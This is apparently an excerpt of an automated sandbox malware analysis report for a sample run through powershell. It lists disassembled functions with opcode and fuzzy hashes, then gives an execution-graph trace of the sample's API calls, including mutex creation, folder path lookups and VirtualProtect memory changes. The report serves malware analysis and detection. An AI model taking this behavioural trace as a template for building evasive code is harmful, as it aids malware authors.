                        • Source File: 00000007.00000002.431624938.00007FF8164C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8164c0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: abf414e41cbccfa759b66c6084eef55adb9b027465a42e8b791b87c1c4bab85f
                        • Instruction ID: a95e9d458a94577f4064aad8951ff3bb45286139770cdc7730d937305580f76a
                        • Opcode Fuzzy Hash: abf414e41cbccfa759b66c6084eef55adb9b027465a42e8b791b87c1c4bab85f
                        • Instruction Fuzzy Hash: 3AA13622D0DEC94FE7AA976C58642B57BE0EF57BA4B0802FBD089CB2D3D9099C15C351
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8163FB958 Relevance: .3, Instructions: 270COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 21abb48f08595d1e9429d8ec8fd3aa0d56ca457320a6692ca02f38d46004dad8
                        • Instruction ID: 0d51aeaf6f93b57d035c180244d6a10f176e9473d82fced454b28b53ec964b91
                        • Opcode Fuzzy Hash: 21abb48f08595d1e9429d8ec8fd3aa0d56ca457320a6692ca02f38d46004dad8
                        • Instruction Fuzzy Hash: 7A81267091CE498FE75CEA18C495AB5B7E1EF953A0F1005BDD08AC71A7DE26FC828741
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8163F94A8 Relevance: .2, Instructions: 250COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5eb9a23a2921367a7655df33baa056a43027459be30b35e20ae23bcf6f83959e
                        • Instruction ID: ee69be4349dfb76ccd9e7958c56b14c3ff9dd82c3befd10cfdf1f11017b37a21
                        • Opcode Fuzzy Hash: 5eb9a23a2921367a7655df33baa056a43027459be30b35e20ae23bcf6f83959e
                        • Instruction Fuzzy Hash: CC11487180EBC58FD7539B348C296947FB0AF23224F0A02DBD488CB0E3D6695809C793
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8163FB99C Relevance: .2, Instructions: 233COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 04ff4447e3f01aadf4de760a79516e09682a502b37c4b46239f2f6273df7196e
                        • Instruction ID: 8ba5a39b8bf7d09ff101bc6945b1d72d615f8fbd33fa1b37ae6e9f73991d6289
                        • Opcode Fuzzy Hash: 04ff4447e3f01aadf4de760a79516e09682a502b37c4b46239f2f6273df7196e
                        • Instruction Fuzzy Hash: 3461F27061CF498FE759EA18C494AB5B7E0EF953A0F1005BDD08AC72A7DA26FC428742
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8164C5113 Relevance: .2, Instructions: 180COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.431624938.00007FF8164C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8164c0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 073b2e97cbbd58ef13b46a49b57fa5fc6b65e7882feaa9aa1fae4807e88af24b
                        • Instruction ID: ad1fdd883b628ccbfec54fa0e338021bfe0881a181f7e60d02c6b366a91e6584
                        • Opcode Fuzzy Hash: 073b2e97cbbd58ef13b46a49b57fa5fc6b65e7882feaa9aa1fae4807e88af24b
                        • Instruction Fuzzy Hash: FF512832E1CE4A4FE79D8A1C54252B877D2EF94770B5802BAC08EC7293DE14E8658381
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8163F8B25 Relevance: .1, Instructions: 146COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0fea6373e9084f4049ba85d2a73469464eb38da6f484e3698117d85c86458045
                        • Instruction ID: cc312c1e0fd5441538dca926a91a1c5d01ae4e88ea90e61ab22ee1ac7515cb13
                        • Opcode Fuzzy Hash: 0fea6373e9084f4049ba85d2a73469464eb38da6f484e3698117d85c86458045
                        • Instruction Fuzzy Hash: C841057191CB884FDB199B189C066A87BE0EB59721F0442AFE089C7292CB756856CB83
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8163FC31C Relevance: .1, Instructions: 109COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7e37d90b6d775ac96ae26a3e6fb49905c666a62466b0bf21dfe113cd9eaa930d
                        • Instruction ID: ab84514d906bc135f6a1f6e6f1f3213f9ab2157576bf9e922f70228ff165024d
                        • Opcode Fuzzy Hash: 7e37d90b6d775ac96ae26a3e6fb49905c666a62466b0bf21dfe113cd9eaa930d
                        • Instruction Fuzzy Hash: D021F73161CA0D5FEB4CEA1CE8599B577D1EB99360B1402BEE44EC7292DD26FC838781
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8164C0B9A Relevance: .1, Instructions: 103COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.431624938.00007FF8164C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8164c0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 83103848f27fc9535189bd0a4229ef821d6eb9809e34b608263e1e6f1cfaa315
                        • Instruction ID: 1d53250db96ebdeeec4d746557032cc8b0511fb80dd8b5541bcd544f175bcab3
                        • Opcode Fuzzy Hash: 83103848f27fc9535189bd0a4229ef821d6eb9809e34b608263e1e6f1cfaa315
                        • Instruction Fuzzy Hash: A531F662E0EE864FF7A9D26C18552786AD1FF46BA4B1802FAC08EC73D3DE099C54C311
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8163F9818 Relevance: .1, Instructions: 102COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3e32d15f3ff00899586a64a48ab3749cdea6aff1099b688e40131e9c807eb551
                        • Instruction ID: 15c8ea03720e7cb4ec30b9c5a2dd9d6b214a8b45f111136102425094c8c5bb74
                        • Opcode Fuzzy Hash: 3e32d15f3ff00899586a64a48ab3749cdea6aff1099b688e40131e9c807eb551
                        • Instruction Fuzzy Hash: 5121F63190CB4C8FEB58DF9C984A7E97BE0EB96331F04426FD049C3192D675A456CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8164C515F Relevance: .1, Instructions: 93COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.431624938.00007FF8164C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8164c0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 51da05615705b7c70d1f7df00bb48491b12bb0f6750d47154e3edac371e1f668
                        • Instruction ID: 1bf874c963c07e6b5599513ad24d8b1aa9c344b8d47e0b7f34262e214e4b6fbf
                        • Opcode Fuzzy Hash: 51da05615705b7c70d1f7df00bb48491b12bb0f6750d47154e3edac371e1f668
                        • Instruction Fuzzy Hash: 9721D222E1DE464FE3AD8A1C54696786AD1EF547B0B5902B9C08EC7292CE18EC758281
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8163F2B14 Relevance: .1, Instructions: 85COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e4ee30455bd0697671f8f4501fc918d10bd5bcf54aac7dd4d6d413aa12b8cdc6
                        • Instruction ID: ebf7725a20873553ce476a569bd6c6b4b126b6aefb45f1d612f958f2956130db
                        • Opcode Fuzzy Hash: e4ee30455bd0697671f8f4501fc918d10bd5bcf54aac7dd4d6d413aa12b8cdc6
                        • Instruction Fuzzy Hash: EE21083011CB498FD749DF18C0956B9B7E1FF95360F1009BDE4CAC72A2EA26A881C742
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8163F8E08 Relevance: .1, Instructions: 84COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4e4d9826924e8a30266539a25f4b356c935d0c9145539c39fa43934625b52dca
                        • Instruction ID: 00f694063be464df93fb7ceffc1d6517721dcb31682ac3760065b68d4da89ada
                        • Opcode Fuzzy Hash: 4e4d9826924e8a30266539a25f4b356c935d0c9145539c39fa43934625b52dca
                        • Instruction Fuzzy Hash: 4B21D83280DA964FD7076B289C565E57FB0EF12361B0902F3D498CB0B3DB1968A9C792
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8164C544C Relevance: .1, Instructions: 61COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.431624938.00007FF8164C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8164c0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 657dfb642105198fef64fa9e8cad43d5dc8edb2abcf969d4aaf6fcb901e94906
                        • Instruction ID: 0473597dc03e434d0194024dfe9d7b788d59a70e7d37f710f9c8bfb5192a2d5d
                        • Opcode Fuzzy Hash: 657dfb642105198fef64fa9e8cad43d5dc8edb2abcf969d4aaf6fcb901e94906
                        • Instruction Fuzzy Hash: 2411A032D0D9854FE3ADDA1894507BC67D0EF547B2B5902BAC08EC7293C909AC748285
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8163F30D8 Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9ff5c229f3ef6f29388a32c22fb735369338c2e7dc0aa970ff080a77efb73ca5
                        • Instruction ID: abf6e5c820529c349f1c2e7f863d34a47577fe882cc34e45504aed69ff0d0eaf
                        • Opcode Fuzzy Hash: 9ff5c229f3ef6f29388a32c22fb735369338c2e7dc0aa970ff080a77efb73ca5
                        • Instruction Fuzzy Hash: 64F0373275C6054FDB4CAA1CF4429B573D1EB95330B00017EE48BC2696D917E8428685
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8163F3094 Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f9ad75683ca1bb0ec92575b80262fa5ef93d8801f7d91920a0372b6ddab5456c
                        • Instruction ID: bb667de60621a85796333574d0b64de19606e4b684596ba91dcc96e94a520d2b
                        • Opcode Fuzzy Hash: f9ad75683ca1bb0ec92575b80262fa5ef93d8801f7d91920a0372b6ddab5456c
                        • Instruction Fuzzy Hash: 9BF0653276C6084FDB4CEA1CF8429B573D1EB99334B00016FE48BC2697D927E8838685
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8164C5BA4 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.431624938.00007FF8164C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8164c0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 52eadc1c3aa611e797af6b64a1cc6bbaac244ec60dd5892aa98036c8f03269c8
                        • Instruction ID: 44d7ca100c655d26e8871465fd7e14e8688d20556be99fc0c76298ce2edbb8e4
                        • Opcode Fuzzy Hash: 52eadc1c3aa611e797af6b64a1cc6bbaac244ec60dd5892aa98036c8f03269c8
                        • Instruction Fuzzy Hash: 1EF0A73131CF044FD744EF1DD445765B7D0FBA8310F10452FE449C3651DA21E8818782
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 00007FF8163F8280 Relevance: 7.6, Strings: 6, Instructions: 101COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: __^($__^)$__^<$__^=$__^J$__^K
                        • API String ID: 0-620535005
                        • Opcode ID: a2c4cd2d313b1323ac612f4e02095505c505fd5726257f8fafac3a71928821bd
                        • Instruction ID: 408c1f8cf9ce56bfcd5998cfba4aba52633c0cde4194ae18ddcf07fdf71a765b
                        • Opcode Fuzzy Hash: a2c4cd2d313b1323ac612f4e02095505c505fd5726257f8fafac3a71928821bd
                        • Instruction Fuzzy Hash: CE31A2A7E245269B97007B3DB4897D87380EF94771B050576C1ED8F0939B2438EE87C4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8163F87A2 Relevance: 6.3, Strings: 5, Instructions: 98COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: __^$__^$__^$__^$__^
                        • API String ID: 0-481791169
                        • Opcode ID: a5d392971c5efcdabc8ea88078795a75993fe38ae65c84bacb5db6ff651d8431
                        • Instruction ID: ecefed927963e22a33d8efa05fe570eaccbb55e75d4a70eb8bb9fb93afe35546
                        • Opcode Fuzzy Hash: a5d392971c5efcdabc8ea88078795a75993fe38ae65c84bacb5db6ff651d8431
                        • Instruction Fuzzy Hash: A231A7A790DAD24FE3198A198CE5190BFA5FF52264B1E03FAC1D84F093FB3528578742
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8163F83AA Relevance: 5.2, Strings: 4, Instructions: 214COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: __^U$__^X$__^f$__^g
                        • API String ID: 0-2875829001
                        • Opcode ID: 1780bc7c7d34725f6d3d4a23cc88f8587946ef7d47dcfb634b98327477a688c3
                        • Instruction ID: 70c1177edf7128e7bf059f4ebd45fac20bfddeafef7ee2d4a67afe7dc32e103f
                        • Opcode Fuzzy Hash: 1780bc7c7d34725f6d3d4a23cc88f8587946ef7d47dcfb634b98327477a688c3
                        • Instruction Fuzzy Hash: F7512A53E0DAE14BE315566CB8152FD6BA0EF81770F4A01F7D1CC8B1D7A9295C4E4386
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Executed Functions

                        Function 00007FF8164E067D Relevance: .6, Instructions: 556COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000001A.00000002.473268471.00007FF8164E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_26_2_7ff8164e0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9571b372a52f2a25b125d5887084a9937f2a17f582567f5b3275b8df8c0c8487
                        • Instruction ID: bf5b42da878477a788e75dce202841658e18b588da019f3bfe609ea34938d538
                        • Opcode Fuzzy Hash: 9571b372a52f2a25b125d5887084a9937f2a17f582567f5b3275b8df8c0c8487
                        • Instruction Fuzzy Hash: B0F1E322D0DEC94FE79696381864AB57FE1EF52BA0B0D02FBD098CB193D90C9CA5C351
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF816412B08 Relevance: .2, Instructions: 197COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000001A.00000002.472700716.00007FF816410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_26_2_7ff816410000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6348a5afe123a94b79261c27113744217eb678f3c2f499ede678acbffa01627b
                        • Instruction ID: 48ea4975acda071e4bb20f2a49c25280c3b0f0d3826476a4e7e6a73c78ff60a0
                        • Opcode Fuzzy Hash: 6348a5afe123a94b79261c27113744217eb678f3c2f499ede678acbffa01627b
                        • Instruction Fuzzy Hash: 0351563290CB864FE749DB28C8919B17BE0FF5636070442BEC0C9C71A3EA28B847C791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8164E082A Relevance: .1, Instructions: 100COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000001A.00000002.473268471.00007FF8164E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_26_2_7ff8164e0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 34ae80c9111cb92d3dcd173ed55277adc71a7b9584a039e9541432bbc38488ac
                        • Instruction ID: 3b6104ff7a48157bec612351d1069fcf21b73349d593c95299611d158f6c8345
                        • Opcode Fuzzy Hash: 34ae80c9111cb92d3dcd173ed55277adc71a7b9584a039e9541432bbc38488ac
                        • Instruction Fuzzy Hash: 0131F622E1DE874FF7A5962818656786AD1FF51BB0B5902BAC0DDCB2D3CD0C9CA4C342
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF816412A95 Relevance: .0, Instructions: 49COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000001A.00000002.472700716.00007FF816410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_26_2_7ff816410000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fc5f0a91a695ff05be30e16252b13f6526685461b7b5eb8fcb1b3adee12f95b5
                        • Instruction ID: bd2e7b5119636fd37dfd9e692bf03f2156d5cbcd4b365a0f118e8a28ef92c99b
                        • Opcode Fuzzy Hash: fc5f0a91a695ff05be30e16252b13f6526685461b7b5eb8fcb1b3adee12f95b5
                        • Instruction Fuzzy Hash: 9901847111CB084FD748EF0CE451AB6B3E0FB85360F10052DE58AC3651DA22E881CB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF816412C18 Relevance: .0, Instructions: 40COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000001A.00000002.472700716.00007FF816410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_26_2_7ff816410000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cab0dfb26e6a670f3fa28cbd8badbbdb7434bd9d3552a51821cb0a99d8650ade
                        • Instruction ID: c5e577b19708b96021383400ed3c53e9a2ca82a6d38bef0a389555db8a4d5b55
                        • Opcode Fuzzy Hash: cab0dfb26e6a670f3fa28cbd8badbbdb7434bd9d3552a51821cb0a99d8650ade
                        • Instruction Fuzzy Hash: 9DF0303276CA084F9B4C9A0CF843AF573D1E789334B40016EE48BC2696E916B8828685
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:3%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:13.4%
                        Total number of Nodes:1172
                        Total number of Limit Nodes:11
                        execution_graph 16303 7ff6935c14e0 16306 7ff6935c1190 16303->16306 16305 7ff6935c14f6 16307 7ff6935c11c4 16306->16307 16308 7ff6935c148b GetStartupInfoW 16306->16308 16309 7ff6935c11f1 Sleep 16307->16309 16314 7ff6935c1206 16307->16314 16312 7ff6935c13e4 16308->16312 16309->16307 16310 7ff6935c1460 _initterm 16310->16314 16312->16305 16313 7ff6935c1261 SetUnhandledExceptionFilter 16313->16314 16314->16310 16314->16312 16315 7ff6935c1326 malloc 16314->16315 16316 7ff6935c1320 16314->16316 16325 7ff6935cdbf0 16314->16325 16317 7ff6935c13ab 16315->16317 16323 7ff6935c1350 16315->16323 16316->16315 16346 7ff6935cd7f0 16317->16346 16320 7ff6935c137d malloc memcpy 16320->16323 16324 7ff6935c13a6 16320->16324 16323->16320 16323->16323 16324->16317 16326 7ff6935cdc0f 16325->16326 16330 7ff6935cdc20 16325->16330 16326->16313 16327 7ff6935cde20 16327->16326 16328 7ff6935cde14 16327->16328 16328->16327 16332 7ff6935cda80 8 API calls 16328->16332 16339 7ff6935cdd53 16328->16339 16329 7ff6935cddc4 16333 7ff6935cde55 16329->16333 16334 7ff6935cddd9 16329->16334 16330->16326 16330->16327 16330->16329 16331 7ff6935cde61 16330->16331 16342 7ff6935cdcb1 16330->16342 16335 7ff6935cda10 8 API calls 16331->16335 16332->16328 16424 7ff6935cda10 16333->16424 16396 7ff6935cda80 16334->16396 16338 7ff6935cde6d 16335->16338 16338->16313 16341 7ff6935cdd58 16339->16341 16340 7ff6935cddea 16343 7ff6935cda80 8 API calls 16340->16343 16341->16326 16344 7ff6935cdd8a VirtualProtect 16341->16344 16342->16329 16342->16333 16342->16339 16342->16340 16342->16341 16345 7ff6935cda80 8 API calls 16342->16345 16343->16328 16344->16341 16345->16342 16347 7ff6935c13be 16346->16347 16348 7ff6935cd780 16346->16348 16350 7ff6935c15c0 16347->16350 16452 7ff6935f1ae0 16348->16452 17057 7ff6935c29f0 16350->17057 16354 7ff6935c1680 16355 7ff6935cf5f0 74 API calls 16354->16355 16357 7ff6935c168f 16355->16357 16356 7ff6935c16f4 CreateMutexW SHGetFolderPathW 16358 7ff6935cf5f0 74 API calls 16356->16358 16357->16356 16357->16357 16359 7ff6935c1778 16358->16359 16360 7ff6935cf5f0 74 API calls 16359->16360 16362 7ff6935c1787 16360->16362 16361 7ff6935c17f2 wcscat SHGetFolderPathW 16363 7ff6935cf5f0 74 API calls 16361->16363 16362->16361 16362->16362 16364 7ff6935c1862 16363->16364 16365 7ff6935cf5f0 74 API calls 16364->16365 16366 7ff6935c1871 16365->16366 16367 7ff6935c18da wcscat 16366->16367 17100 7ff6935c2250 16367->17100 16369 7ff6935c18f4 16370 7ff6935cf5f0 74 API calls 16369->16370 16371 7ff6935c1902 16370->16371 16372 7ff6935cf5f0 74 API calls 16371->16372 16373 7ff6935c1911 16372->16373 16374 7ff6935cf5f0 74 API calls 16373->16374 16375 7ff6935c1994 16374->16375 16376 7ff6935cf5f0 74 API calls 16375->16376 16377 7ff6935c19a5 16376->16377 16378 7ff6935cf5f0 74 API calls 16377->16378 16379 7ff6935c19fa 16378->16379 16380 7ff6935cf5f0 74 API calls 16379->16380 16381 7ff6935c1a09 16380->16381 16382 7ff6935cf5f0 74 API calls 16381->16382 16383 7ff6935c1a85 16382->16383 16384 7ff6935cf5f0 74 API calls 16383->16384 16385 7ff6935c1a94 16384->16385 17149 7ff6935c3c40 16385->17149 16387 7ff6935c1ae8 16388 7ff6935cf5f0 74 API calls 16387->16388 16391 7ff6935c1b08 16388->16391 16389 7ff6935cf5f0 74 API calls 16389->16391 16390 7ff6935c1c58 _wcsicmp 16390->16391 16391->16389 16391->16390 16393 7ff6935c1cb8 GetFileAttributesW 16391->16393 16395 7ff6935c2120 7 API calls 16391->16395 17155 7ff6935c29a0 16391->17155 17158 7ff6935c3d20 16391->17158 16393->16391 16395->16391 16402 7ff6935cda9a 16396->16402 16397 7ff6935cdb4c 16397->16340 16398 7ff6935cdbd2 16399 7ff6935cda10 4 API calls 16398->16399 16418 7ff6935cdbe1 16399->16418 16400 7ff6935cdb0c VirtualQuery 16401 7ff6935cdbb7 16400->16401 16400->16402 16401->16398 16403 7ff6935cda10 4 API calls 16401->16403 16402->16397 16402->16398 16402->16400 16404 7ff6935cdb60 VirtualProtect 16402->16404 16403->16398 16404->16397 16405 7ff6935cdb98 GetLastError 16404->16405 16406 7ff6935cda10 4 API calls 16405->16406 16406->16402 16407 7ff6935cddc4 16410 7ff6935cde55 16407->16410 16411 7ff6935cddd9 16407->16411 16408 7ff6935cde61 16412 7ff6935cda10 4 API calls 16408->16412 16409 7ff6935cda80 4 API calls 16413 7ff6935cde14 16409->16413 16414 7ff6935cda10 4 API calls 16410->16414 16415 7ff6935cda80 4 API calls 16411->16415 16416 7ff6935cde6d 16412->16416 16413->16409 16422 7ff6935cdc0f 16413->16422 16423 7ff6935cdd53 16413->16423 16414->16408 16417 7ff6935cddea 16415->16417 16416->16340 16419 7ff6935cda80 4 API calls 16417->16419 16418->16407 16418->16408 16418->16410 16418->16413 16418->16417 16421 7ff6935cda80 VirtualQuery VirtualProtect GetLastError VirtualProtect 16418->16421 16418->16422 16418->16423 16419->16413 16420 7ff6935cdd8a VirtualProtect 16420->16423 16421->16418 16422->16340 16423->16420 16423->16422 16430 7ff6935cda3d 16424->16430 16425 7ff6935cdb4c 16425->16331 16426 7ff6935cdbd2 16427 7ff6935cda10 4 API calls 16426->16427 16435 7ff6935cdbe1 16427->16435 16428 7ff6935cdb0c VirtualQuery 16429 7ff6935cdbb7 16428->16429 16428->16430 16429->16426 16431 7ff6935cda10 4 API calls 16429->16431 16430->16425 16430->16426 16430->16428 16432 7ff6935cdb60 VirtualProtect 16430->16432 16431->16426 16432->16425 16433 7ff6935cdb98 GetLastError 16432->16433 16434 7ff6935cda10 4 API calls 16433->16434 16434->16430 16436 7ff6935cddc4 16435->16436 16437 7ff6935cde14 16435->16437 16438 7ff6935cde61 16435->16438 16440 7ff6935cde55 16435->16440 16445 7ff6935cddea 16435->16445 16449 7ff6935cda80 VirtualQuery VirtualProtect GetLastError VirtualProtect 16435->16449 16450 7ff6935cdc0f 16435->16450 16451 7ff6935cdd53 16435->16451 16436->16440 16441 7ff6935cddd9 16436->16441 16439 7ff6935cda80 4 API calls 16437->16439 16437->16450 16437->16451 16442 7ff6935cda10 4 API calls 16438->16442 16439->16437 16443 7ff6935cda10 4 API calls 16440->16443 16444 7ff6935cda80 4 API calls 16441->16444 16447 7ff6935cde6d 16442->16447 16443->16438 16444->16445 16446 7ff6935cda80 4 API calls 16445->16446 16446->16437 16447->16331 16448 7ff6935cdd8a VirtualProtect 16448->16451 16449->16435 